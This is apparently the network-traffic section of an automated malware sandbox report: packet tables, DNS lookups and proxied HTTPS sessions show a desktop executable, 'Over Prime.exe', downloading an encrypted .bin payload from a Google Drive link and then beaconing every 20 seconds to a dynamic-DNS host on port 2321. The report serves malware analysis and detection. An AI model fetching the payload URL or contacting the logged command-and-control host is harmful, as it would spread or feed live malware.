May 30, 2022 14:45:59.220591068 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220597982 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220607042 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220736027 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220738888 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220746040 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220753908 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220896959 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220907927 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221059084 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.221066952 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221085072 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221097946 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221221924 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.221234083 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221268892 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.221277952 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221288919 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221390963 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.221400023 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221402884 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.221487999 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.221496105 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221602917 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221705914 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.221714973 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221776962 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221868038 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.221877098 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.221976995 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.222003937 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.222137928 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.222254992 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.222264051 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.222446918 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.222454071 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.222590923 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.222780943 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.222793102 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.222805023 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.222923040 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223031044 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223110914 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223126888 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223227024 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223232985 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223251104 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223344088 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223351002 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223428011 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223460913 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223469973 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223509073 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223515987 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223588943 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223650932 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223656893 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223659039 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223669052 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223747015 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223778963 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223805904 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223810911 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.223818064 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.223958969 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224019051 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224026918 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224081993 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224129915 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224138021 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224179029 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224186897 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224189997 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224195957 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224289894 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224301100 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224308014 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224314928 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224318027 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224324942 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224423885 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224431038 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224433899 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224472046 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224477053 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224487066 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224631071 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224637985 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224747896 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.224858999 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.224946022 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.227850914 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.227870941 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.377358913 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:45:59.396706104 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:45:59.397008896 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:45:59.402713060 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:45:59.468297958 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:45:59.519098043 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:45:59.538418055 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:45:59.542443037 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:45:59.619230986 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:45:59.619502068 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:45:59.693624020 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:45:59.811031103 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:45:59.813142061 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:45:59.880449057 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:46:00.822797060 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:46:00.825145960 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:46:00.900911093 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:46:20.953908920 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:46:20.955862045 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:46:21.025479078 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:46:41.109317064 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:46:41.110833883 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:46:41.187268972 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:47:01.303060055 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:47:01.304944038 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:47:01.380880117 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:47:21.483938932 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:47:21.485744953 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:47:21.561773062 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:47:41.626332045 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:47:41.629561901 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:47:41.704215050 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:48:01.811677933 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:48:01.813049078 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:48:01.889611959 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:48:22.018013000 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:48:22.020303011 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:48:22.096035004 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:48:42.184222937 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:48:42.185791969 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:48:42.262274981 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:49:02.412554026 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:49:02.415163994 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:49:02.490256071 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:49:22.622051001 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:49:22.623358965 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:49:22.700310946 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:49:42.811148882 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:49:42.812549114 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:49:42.882090092 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:50:02.948889017 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:50:02.950901031 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:50:03.028999090 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:50:23.117429018 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:50:23.119685888 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:50:23.195403099 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:50:43.306735992 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:50:43.308561087 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:50:43.383806944 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:51:03.542339087 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:51:03.544327021 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:51:03.620188951 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:51:23.728903055 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:51:23.731148958 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:51:23.806845903 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:51:43.900659084 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:51:43.902278900 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:51:43.978568077 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:52:04.105655909 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:52:04.107513905 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:52:04.178363085 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:52:24.292021036 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:52:24.293473005 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:52:24.369961977 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:52:44.460326910 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:52:44.462908030 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:52:44.538284063 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:53:04.686886072 CEST	2321	49771	185.20.186.25	192.168.11.20
May 30, 2022 14:53:04.687455893 CEST	49771	2321	192.168.11.20	185.20.186.25
May 30, 2022 14:53:04.764007092 CEST	2321	49771	185.20.186.25	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 30, 2022 14:45:07.342516899 CEST	61773	53	192.168.11.20	1.1.1.1
May 30, 2022 14:45:07.350765944 CEST	53	61773	1.1.1.1	192.168.11.20
May 30, 2022 14:45:08.196837902 CEST	64748	53	192.168.11.20	1.1.1.1
May 30, 2022 14:45:08.235410929 CEST	53	64748	1.1.1.1	192.168.11.20
May 30, 2022 14:45:59.365257978 CEST	53132	53	192.168.11.20	1.1.1.1
May 30, 2022 14:45:59.375673056 CEST	53	53132	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 30, 2022 14:45:07.342516899 CEST	192.168.11.20	1.1.1.1	0xc4ea	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
May 30, 2022 14:45:08.196837902 CEST	192.168.11.20	1.1.1.1	0x83a9	Standard query (0)	doc-0g-2k-docs.googleusercontent.com	A (IP address)	IN (0x0001)
May 30, 2022 14:45:59.365257978 CEST	192.168.11.20	1.1.1.1	0x5bd9	Standard query (0)	entralent200.sytes.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 30, 2022 14:44:30.483545065 CEST	1.1.1.1	192.168.11.20	0x6a08	No error (0)	www-bing-com.dual-a-0001.a-msedge.net	dual-a-0001.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
May 30, 2022 14:44:30.483545065 CEST	1.1.1.1	192.168.11.20	0x6a08	No error (0)	dual-a-0001.a-msedge.net		204.79.197.200	A (IP address)	IN (0x0001)
May 30, 2022 14:44:30.483545065 CEST	1.1.1.1	192.168.11.20	0x6a08	No error (0)	dual-a-0001.a-msedge.net		13.107.21.200	A (IP address)	IN (0x0001)
May 30, 2022 14:44:30.683355093 CEST	1.1.1.1	192.168.11.20	0x8195	No error (0)	devcenterapi.azure-api.net	apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
May 30, 2022 14:44:30.683355093 CEST	1.1.1.1	192.168.11.20	0x8195	No error (0)	devcenterapi-eastus-01.regional.azure-api.net	apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net		CNAME (Canonical name)	IN (0x0001)
May 30, 2022 14:45:07.350765944 CEST	1.1.1.1	192.168.11.20	0xc4ea	No error (0)	drive.google.com		142.250.186.110	A (IP address)	IN (0x0001)
May 30, 2022 14:45:08.235410929 CEST	1.1.1.1	192.168.11.20	0x83a9	No error (0)	doc-0g-2k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
May 30, 2022 14:45:08.235410929 CEST	1.1.1.1	192.168.11.20	0x83a9	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.65	A (IP address)	IN (0x0001)
May 30, 2022 14:45:59.375673056 CEST	1.1.1.1	192.168.11.20	0x5bd9	No error (0)	entralent200.sytes.net		185.20.186.25	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-0g-2k-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49737	142.250.186.110	443	C:\Users\user\Desktop\Over Prime.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-30 12:45:07 UTC	0	OUT	GET /uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-05-30 12:45:08 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 May 2022 12:45:08 GMT Location: https://doc-0g-2k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959//1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version= Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-0VMwwbP2kUM4j2oJNeVvdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49738	142.250.185.65	443	C:\Users\user\Desktop\Over Prime.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-30 12:45:08 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959/*/1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0g-2k-docs.googleusercontent.com Connection: Keep-Alive
2022-05-30 12:45:08 UTC	1	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduLBTYJ5bSvu0T4CtgqUkCnowlZCrQlgqxMuQld4sGMSifgunbpyMOK-8YM8_rTKinIhu0Up-KILKscLzTE-SxCiOb7gWzA Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="Entralent_Raw_HKLpdUcQg124.bin";filename*=UTF-8''Entralent_Raw_HKLpdUcQg124.bin Content-Length: 473664 Date: Mon, 30 May 2022 12:45:08 GMT Expires: Mon, 30 May 2022 12:45:08 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=gxarMg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-05-30 12:45:08 UTC	5	IN	Data Raw: 85 82 ae c4 b6 e6 4f 9a 9f 0e 3d fd 36 0f e7 72 0e 88 19 30 99 ca d1 f8 8b b2 12 e8 9f f3 6b a6 36 56 f3 99 1a 5f 89 55 67 8d bb d3 d6 58 8d b3 c8 a9 bc dd 95 04 fa bf ee 7d 9c 19 0e e3 bd f6 52 4e 1c 6e 5b 51 b5 5e 77 b1 9c 2e b8 36 db 3f ec cb 01 b8 45 d0 75 bc 18 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 12 d9 cd b7 69 6f f9 17 60 fa a4 88 af 6b 00 66 b3 39 dd 78 4e f3 17 11 74 8e b6 f0 64 36 f9 b2 bb 3e 96 eb 5b ff cb f1 f7 a5 0f b6 b9 e5 2e 8d c2 6c 9d f9 20 ef b0 6d 25 d4 e2 be a3 0e ba f4 1e 29 a5 dc 05 48 a5 29 e9 30 78 44 56 eb ae 33 1d 4c ae bf ed 4a cd e1 1f 86 2c 4d c9 d7 c6 62 5e 17 ff c4 37 6d 70 3e ab 76 8f 2b 70 37 83 a4 b2 9e 35 ca f9 73 6b 32 4f 16 73 d8 76 99 3c 9d 31 10 7c ea 14 d1 98 e7 6b 1d ac e5 54 35 f1 08 1b Data Ascii: O=6r0k6V_UgX}RNn[Q^w.6?Eu2.l"":>s*^io`kf9xNtd6>[.l m%)H)0xDV3LJ,Mb^7mp>v+p75sk2Osv<1\|kT5
2022-05-30 12:45:08 UTC	9	IN	Data Raw: fa 12 4c 77 9e dd c2 95 06 7a a3 c3 a5 dc d6 cb 5a e4 bb ac b3 77 94 d3 9e 9b cf 03 4b e4 39 41 9a ce 10 0e 77 6d c2 4b fd 61 98 72 16 31 f8 a5 b0 ba e2 38 36 22 da d3 ea c9 75 14 01 2a 7c 45 e5 34 71 3c d8 0a 6f 99 8c c0 82 a1 01 35 01 f4 61 ec 32 30 a4 88 66 b8 2e 3b dd 60 48 3a 32 d4 b5 2a 23 96 42 87 94 db 12 8e 32 61 03 6f 74 53 44 ee f4 dd 22 2f 3c 4b e3 6e 2c b1 9e fd 9a e1 59 57 c7 22 67 f7 70 b7 df 06 a8 67 ad e5 b9 13 d4 f3 7a 8b f3 84 27 45 66 45 e9 8e bd 5c fa 1f dd fe e6 c3 9d 7b 96 33 40 4f c8 e4 9e fb e1 24 69 7e 78 50 06 be 23 77 39 78 f6 d3 80 dd eb bb 6e d8 44 03 64 3a f9 3c 5d 36 50 fd ec 28 d0 71 eb 26 32 ed cf 24 36 a0 13 d7 4e c8 eb a2 6f 3f 80 fb 8f 2e de cd 71 90 25 0e ad 10 2f 93 29 a8 ab 4d 9e e1 c1 2e ff eb a7 85 c1 c0 6e 4a 3c Data Ascii: LwzZwK9AwmKar186"u\|E4q<o5a20f.;`H:2#B2aotSD"/<Kn,YW"gpgz'EfE\{3@O$i~xP#w9xnDd:<]6P(q&2$6No?.q%/)M.nJ<
2022-05-30 12:45:08 UTC	13	IN	Data Raw: 1f ce e1 fd 99 2b 2e 74 0d 20 89 75 df 81 35 ff 7c aa 9e b2 5a 5c 4d 66 43 08 91 59 70 8e 2c d4 b6 38 0a 3c 03 9a d3 8b 23 4e 1f 9b 4b 74 99 c8 62 8a ea e0 e0 9f 4a 30 9a 55 b5 0b 25 e6 17 df af 2b 2c c0 ab 40 7d 9c 55 5b 9d 37 15 32 47 c3 5b 2c 15 bb 54 80 71 b7 a3 a9 14 c1 07 e6 40 1b 0d 16 dc 31 a7 49 96 90 7d d7 14 ed 5b fc 8b 73 93 a9 e4 c6 a6 67 1c 05 e9 5a 82 10 1c 86 8d ba ca 6c 10 0d a0 13 bd d1 e4 5c 98 d7 e5 15 71 7d b2 1c 53 cf 00 3d 47 8a 90 f7 d2 b9 c2 d7 0f 2a fe d1 4c 63 d0 4c 15 09 87 cc 7e d1 a3 bb d5 2f a2 f1 19 4c cc 9c 80 7f a5 b7 1c e0 44 1b dd 1e 61 c7 5d 86 c3 0e f8 77 2f ef 13 40 73 64 7e ae a8 3c 46 8c 75 6d c0 24 39 80 b7 0d 33 fa 8d 67 61 94 9b 55 27 75 df 48 2f 34 ea e7 50 94 a3 a5 69 55 0f 86 c0 c0 08 62 42 cc f2 de bd c0 88 Data Ascii: +.t u5\|Z\MfCYp,8<#NKtbJ0U%+,@}U[72G[,Tq@1I}[sgZl\q}S=G*LcL~/LDa]w/@sd~<Fum$93gaU'uH/4PiUbB
